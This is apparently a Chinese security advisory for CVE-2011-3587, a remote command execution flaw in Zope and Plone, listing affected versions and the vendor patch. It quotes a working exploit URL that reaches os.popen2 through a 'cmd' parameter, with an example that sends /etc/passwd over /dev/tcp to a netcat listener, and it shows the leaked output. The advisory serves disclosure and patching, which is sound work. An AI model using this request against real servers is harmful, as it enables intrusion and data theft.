Zope “cmd”参数远程命令执行漏洞


发布日期:2011-12-22
更新日期:2011-12-23

受影响系统:
Zope Zope 2.13.9
Zope Zope 2.13.8
Zope Zope 2.13
Zope Zope 2.12.19
Zope Zope 2.12
Plone Plone 4.x
不受影响系统:
Zope Zope 2.13.10
Zope Zope 2.12.20
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 49857
CVE ID: CVE-2011-3587

Zope是一个开源的web应用服务器,主要用python写成。

Zope在实现上存在远程命令执行漏洞,非法攻击者可利用此漏洞部署特制的Web请求并以Zope/Plone服务权限执行任意命令。

<*来源:Alan Hoey
 
  链接:http://plone.org/products/plone/security/advisories/20110928
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Alan Hoey ()提供了如下测试方法:

# Exploit Title: Plone - Remote Command Execution
# Date: 12/21/2011
# Author: Nick Miles (www.npenetrable.com)
# Tested on: 12/21/2011
# CVE : CVE-2011-3587

Versions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone
4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x.
Versions Not Affected: Versions of Plone that use Zope other than Zope
2.12.x and Zope 2.13.x.

Advisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928

You can execute any command on the remote Plone server with the
following request
if the server is Unix/Linux based (Note: you won't get returned the
results of the command):

http://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command
to run>

Example:

Listen for a connection:
$ nc -l 4040

On victim, visit:
http://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040

Response:
$ nc -l 4040
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
plone:x:500:500::/home/plone:/bin/false

建议:
--------------------------------------------------------------------------------
厂商补丁:

Zope
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.zope.org/

相关内容